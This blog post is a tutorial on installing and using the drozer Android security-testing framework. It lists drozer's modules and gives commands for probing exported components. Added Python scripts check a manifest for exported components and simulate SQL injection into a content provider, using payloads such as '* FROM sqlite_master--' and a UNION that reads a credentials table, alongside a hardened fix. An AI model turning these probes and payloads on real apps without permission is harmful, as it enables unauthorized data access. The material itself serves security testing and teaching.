Drozer Installation and Usage Notes
1. Introduction
- drozer user guide (mwri-drozer-user-guide-2015-03-23.pdf)
- drozer project on GitHub: https://github.com/mwrlabs/drozer
2. Download
Download page: https://labs.f-secure.com/tools/drozer/
- Windows client: drozer (msi)
- Android agent: drozer (Agent .apk only)
3. Installation and connection setup
1) On the phone, install and run the Android agent, then turn on the Embedded Server;
2) On the PC, install the Windows client, choosing the Python root directory as the install location;
3) Open a command prompt, change to the install directory C:\Python27\Scripts, and run adb to forward local port 31415 to port 31415 on the device, the port the drozer agent listens on:
adb forward tcp:31415 tcp:31415
4) Enter the Drozer console:
drozer console connect
5) Fixing Python errors:
a. ImportError: No module named google.protobuf
Fix: pip install protobuf
b. ImportError: No module named OpenSSL
Fix: pip install pyOpenSSL
c. drozer Server requires Twisted to run.
Fix: pip install twisted
d. UserWarning: You do not have a working installation of the service_identity module: 'No module named service_identity'. Please install it from https://pypi.python.org/pypi/service_identity and make sure all of its dependencies are satisfied.
Fix: pip install service_identity
6) Run the list command to list all Drozer modules; if the list is displayed, Drozer is installed correctly:
drozer Console (v2.4.4)
dz> list
app.activity.forintent                   Find activities that can handle the given intent
app.activity.info                        Gets information about exported activities.
app.activity.start                       Start an Activity
app.broadcast.info                       Get information about broadcast receivers
app.broadcast.send                       Send broadcast using an intent
app.broadcast.sniff                      Register a broadcast receiver that can sniff particular intents
app.package.attacksurface                Get attack surface of package
app.package.backup                       Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP)
app.package.debuggable                   Find debuggable packages
app.package.info                         Get information about installed packages
app.package.launchintent                 Get launch intent of package
app.package.list                         List Packages
app.package.manifest                     Get AndroidManifest.xml of package
app.package.native                       Find Native libraries embedded in the application.
app.package.shareduid                    Look for packages with shared UIDs
app.provider.columns                     List columns in content provider
app.provider.delete                      Delete from a content provider
app.provider.download                    Download a file from a content provider that supports files
app.provider.finduri                     Find referenced content URIs in a package
app.provider.info                        Get information about exported content providers
app.provider.insert                      Insert into a Content Provider
app.provider.query                       Query a content provider
app.provider.read                        Read from a content provider that supports files
app.provider.update                      Update a record in a content provider
app.service.info                         Get information about exported services
app.service.send                         Send a Message to a service, and display the reply
app.service.start                        Start Service
app.service.stop                         Stop Service
auxiliary.webcontentresolver             Start a web service interface to content providers.
exploit.jdwp.check                       Open @jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider       Reads APN content provider
exploit.pilfer.general.settingsprovider  Reads Settings content provider
information.datetime                     Print Date/Time
information.deviceinfo                   Get verbose device information
information.permissions                  Get a list of all permissions used by packages on the device
scanner.activity.browsable               Get all BROWSABLE activities that can be invoked from the web browser
scanner.misc.native                      Find native components included in packages
scanner.misc.readablefiles               Find world-readable files in the given folder
scanner.misc.secretcodes                 Search for secret codes that can be used from the dialer
scanner.misc.sflagbinaries               Find suid/sgid binaries in the given folder (default is /system).
scanner.misc.writablefiles               Find world-writable files in the given folder
scanner.provider.finduris                Search for content providers that can be queried from our context.
scanner.provider.injection               Test content providers for SQL injection vulnerabilities.
scanner.provider.sqltables               Find tables accessible through SQL injection vulnerabilities.
scanner.provider.traversal               Test content providers for basic directory traversal vulnerabilities.
shell.exec                               Execute a single Linux command.
shell.send                               Send an ASH shell to a remote listener.
shell.start                              Enter into an interactive Linux shell.
tools.file.download                      Download a File
tools.file.md5sum                        Get md5 Checksum of file
tools.file.size                          Get size of file
tools.file.upload                        Upload a File
tools.setup.busybox                      Install Busybox.
tools.setup.minimalsu                    Prepare 'minimal-su' binary installation on the device.
4. Common commands
1) Query package information:
run app.package.info -a <PACKAGE>
2) Determine the app's attack surface, i.e. list its exported components:
run app.package.attacksurface <PACKAGE>
3) Attacking Activities
a. Query exported activity information
run app.activity.info -a <PACKAGE>
b. Use app.activity.start to test for the vulnerability (can the activity be reached directly, bypassing the login screen? If so, that is an authorization bypass)
run app.activity.start --component <PACKAGE> <COMPONENT>
4) Attacking broadcast receivers:
Look at the decompiled AndroidManifest.xml: a receiver that declares an intent-filter but sets no android:exported attribute is exported by default (for apps targeting API levels below 31), so any other app can deliver broadcasts to it. That is an authorization problem: an attacker can send a malicious broadcast or forge the messages the receiver expects. Also try a denial-of-service attack by sending the receiver an incomplete intent (empty action or missing extras); a receiver that does not null-check what it receives will crash.
a. Query broadcast receiver information
run app.broadcast.info -a <PACKAGE>
b. Send a broadcast to the receiver
run app.broadcast.send --action <ACTION>
5) Attacking Services
If the app under test does not control access to its Service properly, any other app can start it:
run app.service.start --component <PACKAGE> <COMPONENT>
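Steps 2) through 5) all hinge on which components the manifest exports. The script below is an added example, not part of the original post and not drozer code: it applies the platform's exported-by-default rule offline to a constructed AndroidManifest.xml (the com.example.target package and all of its component names are invented), so the result of app.package.attacksurface can be cross-checked against a decompiled manifest, including which exported components carry a protecting android:permission and which do not.

```python
"""Static attack-surface check against an AndroidManifest.xml (added example,
not drozer code).  Applies the platform default that drozer's
app.package.attacksurface also relies on: an unset android:exported means
"exported" for a component that has an intent-filter (targetSdk < 31) and for
content providers on targetSdk < 17."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "receiver", "service", "provider")

# Constructed sample manifest; the package and component names are invented.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.target">
  <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="30"/>
  <application>
    <activity android:name=".LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminPanelActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter>
        <action android:name="com.example.target.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SecureReceiver"
              android:permission="com.example.target.PERM">
      <intent-filter>
        <action android:name="com.example.target.PROTECTED"/>
      </intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="false"/>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.target.notes"
              android:exported="true"/>
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an attribute from the android: namespace (None when absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, target_sdk):
    """An explicit android:exported wins.  Otherwise a provider is exported
    only when targetSdk < 17, and any other component is exported when it
    declares an intent-filter and targets an SDK below 31 (from 31 on the
    attribute is mandatory for filtered components; the APK would not install)."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17
    return elem.find("intent-filter") is not None and target_sdk < 31


def attack_surface(manifest_xml, target_sdk=None):
    """Return {tag: [(fully qualified name, protecting permission or None)]}
    for exported components, the information app.package.attacksurface and the
    app.*.info modules summarise.  target_sdk overrides the manifest's value."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    if target_sdk is None:
        uses_sdk = root.find("uses-sdk")
        declared = None
        if uses_sdk is not None:
            declared = attr(uses_sdk, "targetSdkVersion") or attr(uses_sdk, "minSdkVersion")
        target_sdk = int(declared) if declared else 1
    surface = {tag: [] for tag in COMPONENT_TAGS}
    application = root.find("application")
    children = list(application) if application is not None else []
    for elem in children:
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, target_sdk):
            continue
        name = attr(elem, "name") or ""
        if name.startswith("."):
            name = package + name  # manifest shorthand for package-relative names
        surface[elem.tag].append((name, attr(elem, "permission")))
    return surface


def unprotected_components(surface):
    """Names of exported components with no android:permission: the ones to
    point app.activity.start, app.broadcast.send, app.service.start and
    app.provider.query at first."""
    return sorted(name for entries in surface.values()
                  for name, perm in entries if perm is None)


if __name__ == "__main__":
    surface = attack_surface(SAMPLE_MANIFEST)
    for tag, entries in surface.items():
        for name, perm in entries:
            note = "  (permission: %s)" % perm if perm else ""
            print("%-15s %s%s" % (tag, name, note))
    print("unprotected:", unprotected_components(surface))
```

Against the constructed manifest this reports LoginActivity (exported only because of its launcher intent-filter), AdminPanelActivity, both receivers and the provider, and flags SecureReceiver as the one exported component a caller must hold a permission for. Pull the real manifest with app.package.manifest and feed it to attack_surface() to compare with what the agent reports.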
6) Content Provider data leakage
A Content Provider exposes data to external apps in tabular form. Each Content Provider is addressed by a URI beginning with "content://", and when the provider is exported without a protecting permission, any app can use that URI to read or modify the providing app's database. Improper access control therefore leaks information.
a. List accessible content URIs:
run scanner.provider.finduris -a <PACKAGE>
b. Using a queryable URI, pull data out of the provider:
run app.provider.query <URI> --vertical
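Step 6) b. shows app.provider.query returning the rows a provider means to expose; the same module's --projection and --selection options are what scanner.provider.injection and scanner.provider.sqltables use to reach tables the URI never named. The script below is an added example, not drozer or Android code: an in-memory SQLite database with constructed notes and credentials tables stands in for the app's database, vulnerable_query() mimics a ContentProvider.query() that concatenates the caller's projection and selection into the statement, and hardened_query() shows the whitelist-plus-bound-parameters form that closes the hole.

```python
"""Simulation of the ContentProvider.query() pattern that drozer's
scanner.provider.injection and app.provider.query --projection/--selection
probe (added example, not drozer or Android code).  In-memory SQLite with
constructed tables stands in for the app's database."""
import sqlite3


def build_db():
    """Constructed sample data: the table behind the notes URI plus a second
    table the provider never intended to expose."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notes(_id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE credentials(_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO notes(title, body) VALUES ('shopping', 'milk, eggs');
        INSERT INTO credentials(username, password) VALUES ('admin', 'hunter2');
    """)
    return db


def vulnerable_query(db, projection=None, selection=None, selection_args=()):
    """Mimics a query() that hands the caller's projection and selection to
    SQLiteDatabase.query() unchanged: selectionArgs are bound, but the
    projection and the selection template are concatenated, so the table
    behind the content URI is only the starting point of the statement."""
    columns = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM notes" % columns
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql, tuple(selection_args)).fetchall()


ALLOWED_COLUMNS = ("_id", "title", "body")


def safe_projection(projection):
    """True when every requested column is one the provider means to expose."""
    return all(col in ALLOWED_COLUMNS for col in (projection or ALLOWED_COLUMNS))


def hardened_query(db, projection=None, filters=None):
    """Hardened form: whitelist the projection (what a SQLiteQueryBuilder
    projection map with setStrict(true) gives you on Android) and replace the
    free-form selection string by column/value pairs that are always bound."""
    if not safe_projection(projection):
        raise ValueError("projection names a column outside the provider's schema")
    sql = "SELECT %s FROM notes" % ", ".join(projection or ALLOWED_COLUMNS)
    args = []
    if filters:
        clauses = []
        for col, value in filters.items():
            if col not in ALLOWED_COLUMNS:
                raise ValueError("filter names a column outside the provider's schema")
            clauses.append("%s = ?" % col)   # column name from the whitelist, value bound
            args.append(value)
        sql += " WHERE " + " AND ".join(clauses)
    return db.execute(sql, tuple(args)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # What `--projection "* FROM sqlite_master--"` does: the comment swallows
    # the real FROM clause and the schema table is returned instead.
    print(vulnerable_query(db, ["* FROM sqlite_master--"]))
    # A selection-based UNION pulling the credentials table through the notes URI.
    print(vulnerable_query(db, None, "1=1 UNION SELECT _id, username, password FROM credentials"))
    # The hardened provider only ever runs whitelisted columns with bound values.
    print(hardened_query(db, ["title"], {"title": "shopping"}))
```

The first injection is the one scanner.provider.sqltables automates; in the console it corresponds to run app.provider.query content://<AUTHORITY>/notes --projection "* FROM sqlite_master--". The UNION shows why a provider that exposes a harmless table still leaks everything in the same database once the selection string is attacker-controlled.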
posted on 2021-04-07 15:08 by EastJason